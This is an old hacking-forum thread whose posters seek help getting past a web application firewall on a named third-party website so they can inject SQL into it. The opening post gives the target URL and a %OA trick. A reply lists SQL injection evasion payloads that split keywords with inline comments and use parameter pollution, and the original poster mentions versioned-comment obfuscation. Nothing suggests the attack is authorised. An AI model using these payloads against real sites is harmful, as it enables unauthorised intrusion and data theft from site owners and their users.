EvilZone

Community => General discussion => Topic started by: p3ng on October 30, 2014, 10:11:16 AM

Title: passby WAF for help
Post by: p3ng on October 30, 2014, 10:11:16 AM
A website with a boring WAF, can't be injected

anyone interested?
URL:
http://dikee.net/textview.asp?id=663%OA

Adding %OA can bypass one
Title: Re: passby WAF for help
Post by: Nortcele on October 30, 2014, 12:29:09 PM
Is there a reason why?

Besides messing with China...
Title: Re: passby WAF for help
Post by: 2d8 on October 30, 2014, 01:06:09 PM
Most WAFs are based on signatures, so there are plenty of ways to modify a request and bypass them.
e.g.:
Code:
/?id=1+union+select+1,2,3/* => /?id=1+un/**/ion+sel/**/ect+1,2,3--
/?id=1;select+1,2,3+from+users+where+id=1-- => /?id=1;select+1&id=2,3+from+users+where+id=1--
Title: Re: passby WAF for help
Post by: p3ng on October 30, 2014, 01:18:20 PM
I had tried many methods; the method you provided isn't available

such as /*!sElecT*/,